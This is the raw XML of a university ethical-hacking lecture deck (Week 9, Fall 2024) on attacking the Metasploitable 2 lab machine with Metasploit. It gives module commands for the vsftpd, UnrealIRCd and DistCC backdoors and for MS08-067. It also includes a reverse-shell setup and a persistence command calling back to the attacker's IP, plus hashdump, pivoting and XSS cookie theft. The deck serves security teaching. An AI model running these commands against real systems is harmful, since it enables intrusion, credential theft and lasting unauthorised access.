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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId23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4404"/>
    <a:srgbClr val="5F6F0F"/>
    <a:srgbClr val="718412"/>
    <a:srgbClr val="65741A"/>
    <a:srgbClr val="70811D"/>
    <a:srgbClr val="7B8D1F"/>
    <a:srgbClr val="839721"/>
    <a:srgbClr val="95AB25"/>
    <a:srgbClr val="BC5500"/>
    <a:srgbClr val="C45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62186" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="53" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="1838" y="53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B4EDC-59C0-49C7-8ADA-5A781B329E02}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>10/11/2024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29053-DC2A-4342-ADD4-2FD729D91E2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2045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8D46A-B586-417D-BFBD-8C8FE0AAF762}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>10/11/2024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BA5BD7-F043-4D1B-AA17-CD412FC534D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705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Exploit 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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vsftpd</a:t>
            </a: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2.3.4 Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Vulnerability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vsftpd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2.3.4 contains a malicious backdoor triggered when a user logs in with a specific username (:)).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Steps to Exploit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Load the Exploit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exploit/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unix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/ftp/vsftpd_234_backdoor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 startAt="2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 the Target’s IP Address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 RHOST [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Metasploitable_IP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]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 startAt="3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Run the Exploit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exploit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 startAt="4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Post-Exploitation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After the exploit, a shell is granted on the target system.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Takeaway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This exploit provides quick root access to the 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Metasploitable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machine.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8199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Isolate Your Test Environment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Always use isolated virtual environments like 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Metasploitable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avoid impacting real systems.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Document Your Process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Keep detailed notes on the vulnerabilities found, the exploits used, and the remediation steps recommended.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Revert Systems After Testing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</a:t>
            </a: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snapshots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revert your virtual machines back to a clean state after testing.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265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Issue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Metasploit Database Not Connecting.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Start the database service manually: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sudo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service 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postgresql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start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sudo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msfdb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init</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Issue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Exploits Failing.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Check network connectivity between the attacking and target machines. Use </a:t>
            </a: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ping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verify.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27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Vulnerability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A malicious backdoor was inserted into the source code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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UnrealIRCd</a:t>
            </a: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3.2.8.1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allowing remote code execution.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Steps to Exploit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Load the Exploit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exploit/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unix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irc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/unreal_ircd_3281_backdoor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 startAt="2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 the Target’s IP Address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 RHOST [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Metasploitable_IP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]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 startAt="3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Run the Exploit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exploit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 startAt="4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Post-Exploitation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This provides a command shell on the target system, allowing for full control of the server.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Takeaway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The backdoor is widely exploitable and provides immediate access.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Fix for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 3.2.8.1 Backdoor Exploit in Metasploit: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Load the Exploit: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First, you load the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 3.2.8.1 exploit as usual:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/unreal_ircd_3281_backdoor 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Select the Payload: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You need to specify which payload Metasploit should use. Since this is a Unix-based exploit, one common payload is the reverse shell.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Set the payload to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/reverse by running the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/reverse 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Configure the Reverse Shell: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You need to set your local IP address (the attacker's IP address, typically the IP of your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> machine):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set LHOST [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Your_Kali_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] 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Set the port on your machine where you want to receive the reverse shell connection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set LPORT 4444 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Set the Target's IP Address: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Configure the IP address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set RHOST [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable_IP_Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] 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Run the Exploit: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Now, run the exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit 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Listening for the Reverse Shell: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If the exploit is successful, you should receive a reverse shell from the target machine. This gives you a session on the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Example Workflow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/unreal_ircd_3281_backdoor set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/reverse set LHOST [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Your_Kali_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] set LPORT 4444 set RHOST [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable_IP_Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By setting the correct payload and configuring the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> settings, you should be able to establish a session successfully. Let me know if you encounter any other issues!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84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Vulnerability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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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DistCC</a:t>
            </a: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Daemon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service allows unauthenticated remote command execution.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Steps to Exploit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Load the Exploit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exploit/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unix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misc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distcc_exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 startAt="2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 the Target’s IP Address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 RHOST [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Metasploitable_IP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]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 startAt="3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Run the Exploit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exploit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 startAt="4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Post-Exploitation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Once exploited, the attacker gains a shell on the system.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Takeaway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This is another service on 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Metasploitable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that allows for easy remote code execution.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581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Vulnerability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The MySQL service on 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Metasploitable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has a weak authentication configuration, allowing attackers to bypass authentication.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Steps to Exploit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Load the Exploit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auxiliary/scanner/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mysql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mysql_login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 startAt="2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 the Target’s IP Address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 RHOSTS [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Metasploitable_IP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]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 startAt="3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Run the Auxiliary Module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run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 startAt="4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Post-Exploitation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Gain access to the MySQL database and potentially exfiltrate sensitive data.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Takeaway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Weak configurations in database services can lead to significant breaches of sensitive information.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263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to Do After Exploiting the System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Privilege Escalation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Use </a:t>
            </a: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Meterpreter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native Linux commands to escalate privileges.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Gather Information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Use Meterpreter commands to gather system information (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sysinfo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list files (ls), and search for sensitive data.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Persistence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Set up persistent access by modifying startup services or scheduling tasks.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Important Meterpreter Commands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sysinfo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Displays system information.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Shows running processes.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migrate: Move to a more stable process for persistence.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hashdump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Dump password hashes.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537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Why Persistence?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Maintaining long-term access to a compromised system even after reboot or user logout.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Methods of Persistence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Scheduled Tasks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Add a task that executes a Meterpreter payload on reboot.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Startup Services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Modify system services to include malicious scripts or payloads.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Example Command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run persistence -U -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60 -p 4444 -r [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Your_IP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709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Exploiting the Web Application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Metasploitable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 runs vulnerable web applications such as </a:t>
            </a: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DVWA (Damn Vulnerable Web Application)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which can be exploited using </a:t>
            </a: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SQL Injection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Cross-Site Scripting (XSS)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Using SQL Injection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the vulnerable page in DVWA.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SQL queries to bypass login or exfiltrate data.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Using Cross-Site Scripting (XSS)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Inject malicious JavaScript code into vulnerable fields.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Exploit the victim’s browser to steal session cookies or redirect to malicious sites.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3891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Pivoting?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Pivoting allows attackers to use a compromised system as a gateway to access other systems within the network.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to Perform Pivoting with Metasploit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</a:t>
            </a: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Meterpreter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the first compromised system.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 the autoroute command to add a route to the internal network.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run autoroute -s [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Internal_Network_IP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]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Scan other machines in the internal network and exploit them.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7620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Vulnerability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MS08-067 is a critical vulnerability in Microsoft’s SMB service that allows for remote code execution.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Steps to Exploit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Load the </a:t>
            </a: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MS08-067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exploit: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exploit/windows/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smb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/ms08_067_netapi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 startAt="2"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLs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 the target’s IP address and payload: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 RHOST [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Target_IP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]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 PAYLOAD windows/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meterpreter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US" sz="11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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 startAt="3"/>
              <a:tabLst>
                <a:tab pos="914400" algn="l"/>
              </a:tabLs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Run the exploit and gain access to the system.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Takeaway</a:t>
            </a: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This vulnerability can be devastating when combined with pivoting techniques.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diagonal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4" name="Straight Connector 13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12" name="bottom lines"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-8916" y="6057149"/>
            <a:ext cx="5498726" cy="820207"/>
            <a:chOff x="-6689" y="4553748"/>
            <a:chExt cx="4125119" cy="615155"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1754302" y="2802395"/>
              <a:ext cx="612775" cy="411548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4115481 h 4115481"/>
                <a:gd name="connsiteX1" fmla="*/ 612775 w 612775"/>
                <a:gd name="connsiteY1" fmla="*/ 3180443 h 4115481"/>
                <a:gd name="connsiteX2" fmla="*/ 612775 w 612775"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 41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4115481">
                  <a:moveTo>
                    <a:pt x="0" y="4115481"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="612775" y="3180443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Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1604659" y="3152814"/>
              <a:ext cx="410751" cy="3621427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  <a:gd name="connsiteX0" fmla="*/ 0 w 410751"/>
                <a:gd name="connsiteY0" fmla="*/ 3614170 h 3614170"/>
                <a:gd name="connsiteX1" fmla="*/ 410751 w 410751"/>
                <a:gd name="connsiteY1" fmla="*/ 2990994 h 3614170"/>
                <a:gd name="connsiteX2" fmla="*/ 405947 w 410751"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 3614170"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 410751"/>
                <a:gd name="connsiteY0" fmla="*/ 3621427 h 3621427"/>
                <a:gd name="connsiteX1" fmla="*/ 410751 w 410751"/>
                <a:gd name="connsiteY1" fmla="*/ 2998251 h 3621427"/>
                <a:gd name="connsiteX2" fmla="*/ 405947 w 410751"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 3621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621427">
                  <a:moveTo>
                    <a:pt x="0" y="3621427"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410751" y="2998251"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="410359" y="2065358"/>
                    <a:pt x="406339" y="932893"/>
                    <a:pt x="405947" y="0"/>
                  </a:cubicBez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1" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1462308" y="3453376"/>
              <a:ext cx="241768" cy="31797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  <a:gd name="connsiteX0" fmla="*/ 0 w 241768"/>
                <a:gd name="connsiteY0" fmla="*/ 3179761 h 3179761"/>
                <a:gd name="connsiteX1" fmla="*/ 238919 w 241768"/>
                <a:gd name="connsiteY1" fmla="*/ 2819370 h 3179761"/>
                <a:gd name="connsiteX2" fmla="*/ 241754 w 241768"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 31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768" h="3179761">
                  <a:moveTo>
                    <a:pt x="0" y="3179761"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="238919" y="2819370"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="238654" y="1947313"/>
                    <a:pt x="242019" y="872057"/>
                    <a:pt x="241754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176" y="584200"/>
            <a:ext cx="8735325" cy="2000251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176" y="2616200"/>
            <a:ext cx="8735325" cy="17526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10/11/2024</a:t>
            </a:fld>
            <a:endParaRPr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748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10/11/2024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667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584200"/>
            <a:ext cx="2742486" cy="558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8882" y="584200"/>
            <a:ext cx="7414869" cy="55880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10/11/2024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88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10/11/2024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676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diagonal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2" name="Straight Connector 11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177" y="2209801"/>
            <a:ext cx="8938472" cy="2764335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5176" y="4951266"/>
            <a:ext cx="7069519" cy="122093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10/11/2024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633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8883" y="1706880"/>
            <a:ext cx="5078677" cy="44653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0707" y="1706880"/>
            <a:ext cx="5078677" cy="44653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10/11/2024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764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701800"/>
            <a:ext cx="5082740" cy="9144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883" y="2717800"/>
            <a:ext cx="5078677" cy="3454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 baseline="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96644" y="1701800"/>
            <a:ext cx="5082740" cy="9144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0707" y="2717800"/>
            <a:ext cx="5078677" cy="3454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 baseline="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="2000" baseline="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10/11/2024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38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10/11/2024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522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10/11/2024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247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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l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4971" y="584200"/>
            <a:ext cx="6094413" cy="5588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10/11/2024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1813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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l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5484971" y="584200"/>
            <a:ext cx="6094413" cy="5588000"/>
          </a:xfrm>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/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10/11/2024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343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100000"/>
                <a:shade val="0"/>
                <a:satMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="85000">
              <a:schemeClr val="bg2">
                <a:tint val="100000"/>
                <a:shade val="30000"/>
                <a:satMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="bg2">
                <a:shade val="60000"/>
                <a:satMod val="10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left lines"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-15870" y="-3174"/>
            <a:ext cx="819993" cy="5229225"/>
            <a:chOff x="-11906" y="-2381"/>
            <a:chExt cx="615155" cy="3921919"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9526" y="0"/>
              <a:ext cx="612775" cy="3919538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3919538">
                  <a:moveTo>
                    <a:pt x="0" y="3919538"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="612775" y="2984500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Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-11906" y="0"/>
              <a:ext cx="410751" cy="3421856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421856">
                  <a:moveTo>
                    <a:pt x="0" y="3421856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410751" y="2798680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409575" y="0"/>
                  </a:ln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Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-7144" y="-2381"/>
              <a:ext cx="238919" cy="29765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919" h="2976561">
                  <a:moveTo>
                    <a:pt x="0" y="2976561"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="238919" y="2616170"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="238654" y="1744113"/>
                    <a:pt x="238390" y="872057"/>
                    <a:pt x="238125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1223963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701797"/>
            <a:ext cx="10360501" cy="4462272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8882" y="6356352"/>
            <a:ext cx="2234618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D029-FB74-4578-B929-F66AA97659CA}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10/11/2024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3501" y="6356352"/>
            <a:ext cx="5281824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3649" y="6356352"/>
            <a:ext cx="101573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4DD1E-5D91-48A3-AD6D-45FBA980D10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5275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21898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600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="10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98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73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48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22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3797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272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Ethical Hacking In ECE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Week9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Simohamed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Roudani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Fall 2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133229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53340-C747-FD1C-ED5A-EA227A329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Up Persistence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3B791-C771-8A0E-D227-A006C1C77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Why Persistence?: Maintaining long-term access to a compromised system even after reboot or user logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods of Persistence:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scheduled Tasks: Add a task that executes a Meterpreter payload on reboot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup Services: Modify system services to include malicious scripts or payloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run persistence -U -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 60 -p 4444 -r [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Your_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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925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53938-923C-F2F2-70A4-72DF28E63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Client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Exploits on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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26C17-742D-9D37-7EA3-AA5C873E4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09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018A0-5904-8AFB-01B3-5042BDF2D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Pivoting and Lateral Movement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19510-BFB4-61D6-DC30-6FD485404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Pivoting?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pivoting allows attackers to use a compromised system as a gateway to access other systems within the network.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81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F5E51-41FC-569D-18FE-3B87F086C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Advanced Exploitation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968C6-3818-43D3-2024-FB2DC575A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Advanced Exploitation Example: MS08-067 (Windows SMB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383772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50962-3081-D5B6-8AA4-A012FCBD9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8521A-ECA8-A9BE-7E2D-2A50DBA6D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Why Ethical Hacking Matters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While Metasploit is a powerful tool for penetration testing, ethical considerations are crucial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always obtain proper authorization before conducting any tests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Misuse of Metasploit can lead to legal consequences, reputational damage, and network disruption.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421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5FF2F-53AF-982C-57EC-FC30283FB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Practices for Using Metasploit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E91D1-9DB0-B89D-72E9-9B5AB7AA1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Isolate Your Test Environment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always use isolated virtual environments like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to avoid impacting real systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Document Your Process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep detailed notes on the vulnerabilities found, the exploits used, and the remediation steps recommended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Revert Systems After Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use snapshots to revert your virtual machines back to a clean state after testing.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5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463D5-415F-5A3E-A79E-A699EECD9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Troubleshooting Common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22C25-7B4C-DE59-01EA-EF3C8F626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31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B7BDE-8849-E915-69F6-A9F3CB9BC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Summary and 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8594D-7E98-5092-7FF4-BEE9857CB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Key Takeaways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting known vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 provides valuable practice in real-world penetration testing techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced attacks like pivoting and persistence help maintain access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3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46D21-C511-56CA-1D82-304F19806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00EC5-3292-8246-CB3E-14370E8C8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Title: Advanced Metasploit Attacks on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subtitle: Week 9 - Exploiting Vulnerabilities on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Simohamed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Roudani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186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DD52A-22D8-FB02-2547-DA1E5A97E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F1C45-2785-A098-FBEE-4CD0B9BEC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Key Objectives for this Week:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand advanced exploitation techniques using Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
